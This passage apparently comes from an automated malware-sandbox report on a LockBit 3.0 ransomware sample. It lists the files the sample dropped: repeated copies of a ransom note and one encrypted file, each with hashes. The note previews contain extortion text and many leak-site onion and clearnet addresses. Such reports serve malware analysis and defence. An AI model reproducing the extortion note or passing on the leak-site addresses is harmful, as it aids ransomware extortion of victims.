browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.982457424962327
                Encrypted:false
                SSDEEP:192:6QUhIWhbf8RttKXxnD8ZFvABlBbLBykFE1E7i0mVbtK0UTTrh7umjf+o:6QsjmRKVGABHHBy2E1uiE/MmzH
                MD5:3E776E0C45C1675C196C9EEF669B37F4
                SHA1:CBFC6F2A55BFBD79760A46D86CCFE700E57E762B
                SHA-256:08B6E660478AD515B79CB0A2BCF42CFBE7092CB9B91A928252A6F0ED0B0BC5A9
                SHA-512:CEF52B2FBB5D9C06ABEDDEE14538FDD9165E42C8F5F0395DAD908CECA0A0C6DA1603F61EC17C3851D29D6BB8B7FAFB3DE248BEF86FA804E257CEBD81CAF29B22
                Malicious:false
                Preview:U......l..aY...X...T.c..S.a...F.......4|..'CJ8...`..].F..U.Y.,..tT...H..yR...P/20..`.IQ.L....._....!.K..R........m..J.h..c.$g....3G.v..9_...y|.Xg..f.A.=.f~J|..C..m"..S-.....3.._88_......![.......f....K....&..W..c.=........t...{)......q.......^p....k..i\.D........,/.V.D!.....v......z...!.K.............~8..Yd..r...h^.|}n.j......v....|.N.7..o...?H.)....J....cH.....;..lW..>.....}..4...@.T...0A...i.....h...u......~%Np..y).&('...H.M.ZG=?...`>..}...N...._.....0...A....X=Fc..;&.:...W. ..T...+j..._qxb.C.y..O..z...Ea.)CYd.I.l.e..?&>.#V[.G..q.d...0jB....N.K.. h;A.w...@s.T.Lk...J......%...V..6.q%^e..wb.#v...V..z.x.$.soldV#...>...3.5....}'i...(......Lc1.C...*m*.Xj.vz..P...........7..1CG!.R[Q.e./.qh.U..c.C.uQu.h,H...#q.[.l..a..e.....~h.9..Cg.F..9..R...`+..\dl.\]..39#...x..... y....%.....xU.a./]......{..E.+...k?U..#x....".......2B.5Xa..bu.(.P.H..Ph>.&..|EY!.e.F..wtIf..r`..d..........\^.jb....".pC......r...{.."...O.......sQ.\`.R.=..e.0`j..._..+..%!io=.Jm

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\BackgroundTransferApi\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\1\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
